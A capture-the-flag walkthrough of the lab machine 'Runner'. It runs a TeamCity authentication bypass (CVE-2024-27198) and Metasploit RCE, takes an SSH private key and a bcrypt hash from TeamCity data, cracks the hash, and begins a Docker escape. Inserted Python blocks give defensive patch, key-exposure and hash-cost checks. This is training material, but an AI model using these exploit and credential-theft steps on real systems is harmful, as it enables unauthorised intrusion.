Runner
OS: Linux
Difficulty: Medium
Points: 30
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.238.77 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.238.77
Nmap scan report for 10.129.238.77
Host is up, received reset ttl 63 (0.13s latency).
Scanned at 2024-04-23 02:46:41 EDT for 11s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open nagios-nsca syn-ack ttl 63 Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
We enumerate subdomains and find the following one.
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.runner.htb" -u http://runner.htb -fw 4
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://runner.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.runner.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 4
________________________________________________
teamcity [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 490ms]
We can see that the TeamCity application and its version are shown.
TeamCity Auth Bypass (CVE-2024-27198)
Researching vulnerabilities for that version, we find that it is possible to create an account for ourselves with the following script and use it to access the application.
python3 CVE-2024-27198.py -t http://teamcity.runner.htb -u doom -p doom
[+] Version Found: 2023.05.3 (build 129390)
[+] Server vulnerable, returning HTTP 200
[+] New user doom created succesfully! Go to http://teamcity.runner.htb/login.html to login with your new credentials :)
It is also possible to obtain RCE with this same vulnerability.
msfconsole
use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
set rhosts teamcity.runner.htb
set rport 80
set lhost tun0
run
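Added example, not part of the original write-up or of the CVE-2024-27198 script: a small Python inventory check that parses the version banner the script printed above ("2023.05.3 (build 129390)") and compares it against 2023.11.4, the release in which JetBrains shipped the fix for CVE-2024-27198 and CVE-2024-27199. That cut-off is the one assumption beyond the page; the host inventory and the extra build numbers are constructed.

```python
import re

# Assumed from JetBrains' advisory: 2023.11.4 is the first release with the fix
# for CVE-2024-27198 / CVE-2024-27199. Anything older is treated as vulnerable.
FIXED_VERSION = (2023, 11, 4)

# Matches the banner format printed above: "2023.05.3 (build 129390)".
# The patch component is optional because major releases ship as e.g. "2024.03".
VERSION_RE = re.compile(r"(\d{4})\.(\d{1,2})(?:\.(\d+))?\s*\(build\s+(\d+)\)")


def parse_version(banner):
    """Return ((year, minor, patch), build) from a TeamCity version banner."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"unrecognised TeamCity version banner: {banner!r}")
    year, minor, patch, build = m.groups()
    return (int(year), int(minor), int(patch or 0)), int(build)


def is_vulnerable(banner, fixed=FIXED_VERSION):
    """True when the banner's version sorts before the fixed release."""
    version, _build = parse_version(banner)
    return version < fixed


def hosts_needing_patch(inventory):
    """Given {host: banner}, return the sorted hosts still below FIXED_VERSION.
    Banners that cannot be parsed are reported too: an unknown version should
    be checked by hand rather than silently passed."""
    needs_patch = []
    for host, banner in inventory.items():
        try:
            if is_vulnerable(banner):
                needs_patch.append(host)
        except ValueError:
            needs_patch.append(host)
    return sorted(needs_patch)


# Constructed inventory: the first entry is the banner from the write-up, the
# other two are made-up hosts and build numbers for illustration only.
SAMPLE_INVENTORY = {
    "teamcity.runner.htb": "2023.05.3 (build 129390)",
    "ci-patched.example": "2023.11.4 (build 999999)",
    "ci-unknown.example": "version unavailable",
}

if __name__ == "__main__":
    for host in hosts_needing_patch(SAMPLE_INVENTORY):
        print(f"{host}: update TeamCity to {'.'.join(map(str, FIXED_VERSION))} or later")
```

The comparison is done on the (year, minor, patch) tuple rather than on the build number, since the banner's version string is what an administrator will actually see in the server UI; the build is kept only for reporting.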
SSH Keys
We can find an RSA private key in the projects.
cat data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys
It is also possible to obtain it from the web page.
We can use that key to connect via SSH as the user john.
chmod 400 id_rsa
ssh -i id_rsa john@10.129.238.77
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-102-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
john@runner:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
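Added example, not code from the write-up or from TeamCity: a Python scanner that walks a data directory looking for PEM private-key headers and reports any key that is also world-readable. It builds a constructed stand-in for the TeamCity data-directory layout shown above (the file name id_rsa under ssh_keys and the placeholder key body are assumptions) so it runs offline.

```python
import os
import re
import stat
import tempfile

# PEM header used by every common private-key encoding (RSA, EC, OpenSSH, PKCS#8).
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |DSA |EC |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")


def scan_for_private_keys(root, max_bytes=1 << 20):
    """Walk `root` and return sorted (relative_path, world_readable) tuples for
    every regular file whose first `max_bytes` contain a PEM private-key header."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue  # unreadable or vanished files are skipped, not fatal
            if PRIVATE_KEY_RE.search(data):
                world_readable = bool(st.st_mode & stat.S_IROTH)
                hits.append((os.path.relpath(path, root), world_readable))
    return sorted(hits)


def build_sample_datadir():
    """Constructed stand-in for the TeamCity data directory from the write-up.
    The key body is a placeholder string, not real key material."""
    root = tempfile.mkdtemp(prefix="teamcity-datadir-")
    key_dir = os.path.join(root, "config", "projects", "AllProjects", "pluginData", "ssh_keys")
    os.makedirs(key_dir)
    key_path = os.path.join(key_dir, "id_rsa")  # assumed file name
    with open(key_path, "wb") as fh:
        fh.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                 b"PLACEHOLDER-NOT-A-REAL-KEY\n"
                 b"-----END OPENSSH PRIVATE KEY-----\n")
    os.chmod(key_path, 0o644)  # deliberately too permissive, so the scan flags it
    with open(os.path.join(root, "config", "main-config.xml"), "wb") as fh:
        fh.write(b"<server/>\n")  # contains no key, must not be reported
    return root


if __name__ == "__main__":
    sample = build_sample_datadir()
    for rel, world_readable in scan_for_private_keys(sample):
        flag = "WORLD-READABLE" if world_readable else "ok"
        print(f"{rel}: private key found [{flag}]")
```

Run it against a real data directory by passing that path to scan_for_private_keys; the point of the check is that a key stored inside an application's data directory is only as protected as that directory and the application's own access controls, which is exactly what the authentication bypass above defeated.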
Lateral Movement
Reviewing the TeamCity files from the first shell, we obtain the hash of the user matthew.
meterpreter > download /data/teamcity_server/datadir/system/buildserver.data
[*] Downloading: /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Downloaded 512.00 KiB of 512.00 KiB (100.0%): /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Completed : /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
strings buildserver.data | grep -A 5 matthew
matthew
<$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
Matthew
matthew@runner.htb
BCRYPT
hasSeenExperimentalOverview
Crack hash
We use john to obtain the password.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
piper123 (?)
1g 0:00:01:21 DONE (2024-04-23 04:48) 0.01221g/s 635.7p/s 635.7c/s 635.7C/s playboy93..onelife
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
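Added example, not part of the write-up: a Python helper that carves bcrypt strings out of a binary blob (the same job `strings | grep` did above, without depending on the hash sitting on its own line) and audits the work factor. The hash is the one recovered above; the surrounding bytes of buildserver.data are constructed, and the cost floor of 10 is the commonly recommended minimum, not a value from the page.

```python
import re

# bcrypt modular-crypt string: $<variant>$<cost>$<22-char salt + 31-char digest>
BCRYPT_RE = re.compile(rb"\$2[abxy]?\$\d{2}\$[./A-Za-z0-9]{53}")

# Hash exactly as it appeared in buildserver.data above; the '<' printed before
# it by `strings` belongs to the surrounding binary record, not to the hash.
SAMPLE_HASH = "$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em"

# Constructed stand-in for the relevant bytes of buildserver.data.
SAMPLE_BLOB = (b"\x00\x07matthew\x00<" + SAMPLE_HASH.encode() +
               b"\x00\x07Matthew\x00\x12matthew@runner.htb\x00\x06BCRYPT\x00")


def find_bcrypt_hashes(blob):
    """Return every bcrypt string found in a binary blob, in order of appearance."""
    return [m.group(0).decode("ascii") for m in BCRYPT_RE.finditer(blob)]


def parse_bcrypt(h):
    """Return (variant, cost, iterations). Cost is log2 of the iteration count,
    so $2a$07$ means 2**7 = 128 rounds, matching john's 'Cost 1 ... is 128'."""
    m = re.fullmatch(r"\$(2[abxy]?)\$(\d{2})\$[./A-Za-z0-9]{53}", h)
    if not m:
        raise ValueError("not a bcrypt hash")
    variant, cost = m.group(1), int(m.group(2))
    if not 4 <= cost <= 31:  # the only costs the algorithm accepts
        raise ValueError(f"bcrypt cost out of range: {cost}")
    return variant, cost, 2 ** cost


def audit_bcrypt(h, min_cost=10):
    """Flag hashes whose work factor is below `min_cost` (10 is the floor
    commonly recommended today; the write-up's hash sits at 7)."""
    variant, cost, iterations = parse_bcrypt(h)
    return {"variant": variant, "cost": cost, "iterations": iterations,
            "weak": cost < min_cost}


if __name__ == "__main__":
    for h in find_bcrypt_hashes(SAMPLE_BLOB):
        report = audit_bcrypt(h)
        print(f"{h[:7]}... cost={report['cost']} ({report['iterations']} rounds)"
              f" {'TOO LOW' if report['weak'] else 'ok'}")
```

A cost of 7 is why john finished in under a minute and a half on four threads; the same wordlist against a cost-12 hash would need roughly 32 times as much work, which is the defender's lever here, alongside not storing reusable credentials where an application bypass can read them.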
Privilege Escalation
In the hosts file we find a new subdomain.
john@runner:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 runner runner.htb teamcity.runner.htb portainer-administration.runner.htb
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
We add it to our hosts file and access a web portal.
With matthew's credentials we can authenticate.
matthew : piper123
After investigating and trying several things, we arrive at this article, which explains how we can exploit a Docker vulnerability to escape the sandbox.
First we create a container with the following characteristics.
We deploy the container and can now access the console.